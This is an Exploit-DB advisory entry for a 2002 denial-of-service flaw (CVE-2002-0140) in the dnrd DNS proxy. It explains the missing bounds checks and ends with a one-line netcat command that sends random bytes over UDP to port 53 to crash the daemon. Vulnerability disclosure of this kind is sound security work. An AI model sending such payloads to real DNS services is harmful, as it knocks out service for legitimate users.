DNRD 1.x/2.x DNS Request/Reply Denial of Service Vulnerability

2002-01-20T00:00:00
ID EDB-ID:21236
Type exploitdb
Reporter Andrew Griffiths
Modified 2002-01-20T00:00:00

Description

DNRD 1.x/2.x DNS Request/Reply Denial Of Service Vulnerability. CVE-2002-0140. Dos exploit for unix platform

                                        
                                            source: http://www.securityfocus.com/bid/3928/info

dnrd (Domain Name Relay Daemon) is a freely available, open-source proxy name server. It will run on a number of Unix and Linux distributions.

There is a lack of sufficient bounds checking in DNS request and reply functions. As a result, it is possible for a remote attacker to cause a denial of service to legitimate users of dnrd.

It is not known whether it is possible to execute arbitrary attacker-supplied instructions as a result of this vulnerability.

dd if=/dev/urandom bs=64 count=1 | nc -u 127.0.0.1 53 -w 1